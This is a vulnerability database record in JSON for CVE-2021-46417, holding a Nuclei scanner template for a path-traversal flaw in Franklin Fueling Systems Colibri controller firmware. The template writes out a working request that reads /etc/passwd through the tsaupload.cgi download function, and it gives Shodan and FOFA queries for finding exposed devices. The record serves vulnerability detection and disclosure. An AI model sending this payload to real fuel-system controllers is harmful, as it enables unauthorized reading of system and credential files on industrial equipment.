{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-46417/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-46417/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-46417/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-46417/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-46417/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-46417"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-46417"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-46417.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2021-46417\n\ninfo:\n  name: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion\n  author: For3stCo1d\n  severity: high\n  description: |\n    Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 is susceptible to local file inclusion because of insecure handling of a download function that leads to disclosure of internal files due to path traversal with root privileges.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n  remediation: |\n    Apply the latest security patch or update provided by Franklin Fueling Systems to fix the LFI vulnerability.\n  reference:\n    - https://packetstormsecurity.com/files/166671/Franklin-Fueling-Systems-Colibri-Controller-Module-1.8.19.8580-Local-File-Inclusion.html\n    - https://drive.google.com/drive/folders/1Yu4aVDdrgvs-F9jP3R8Cw7qo_TC7VB-R\n    - http://packetstormsecurity.com/files/166610/FFS-Colibri-Controller-Module-1.8.19.8580-Directory-Traversal.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-46417\n    - https://github.com/KayCHENvip/vulnerability-poc\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-46417\n    cwe-id: CWE-22\n    epss-score: 0.59753\n    epss-percentile: 0.991\n    cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: franklinfueling\n    product: colibri_firmware\n    shodan-query:\n      - http.html:\"Franklin Fueling Systems\"\n      - http.html:\"franklin fueling systems\"\n    fofa-query: body=\"franklin fueling systems\"\n  tags: cve2021,cve,packetstorm,franklinfueling,lfi,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=\"\n\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n# digest: 4a0a00473045022100999ba3fc49c7aa241ae86b2f2be3145159a9ec0500978ecc2a3ebb52c3ba8f1102206ccb55bf33e907136d51065b02eacdb12a1d6f6db36f95dcb7fdcb97d0f01aea:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-46417"
}